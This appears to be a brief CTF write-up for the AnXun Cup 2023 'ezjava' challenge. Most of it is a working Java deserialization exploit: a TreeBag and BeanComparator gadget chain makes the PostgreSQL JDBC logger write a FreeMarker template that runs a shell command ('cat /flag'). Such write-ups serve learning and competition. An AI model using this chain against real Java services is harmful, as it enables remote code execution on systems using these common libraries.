安洵杯2023

ezjava

用treebag连接cb中的BeanComparator调用任意getter

通过postgresql写文件，最后freemarker模板注入rce

package exp;

import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.collections.bag.TreeBag;
import org.postgresql.ds.PGConnectionPoolDataSource;

import static exp.Util.serial;
import static exp.Util.setFieldValue;

public class CB
{
    public static void main(String[] args) throws Exception
    {
        String loggerLevel = "debug";
        String loggerFile = "/app/templates/index.ftl";
        String shellContent="<#assign ac=springMacroRequestContext.webApplicationContext>\n" +
                "<#assign fc=ac.getBean('freeMarkerConfiguration')>\n" +
                "<#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n" +
                "<#assign VOID=fc.setNewBuiltinClassResolver(dcr)>\n"+
                "/${\"freemarker.template.utility.Execute\"?new()(\"cat /flag\")}";
        String jdbcUrl = "jdbc:postgresql://aaaa/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile;
        PGConnectionPoolDataSource pg = new PGConnectionPoolDataSource();
        pg.setURL(jdbcUrl);
        pg.setServerNames(new String[]{shellContent});
//        pg.getConnection();

        BeanComparator comparator = new BeanComparator("description");
//        setFieldValue(comparator,"property","outputProperties");

        TreeBag treeBag = new TreeBag(comparator);
        treeBag.add(pg);
        setFieldValue(comparator,"property","connection");
        System.out.println(serial(treeBag));
    }
}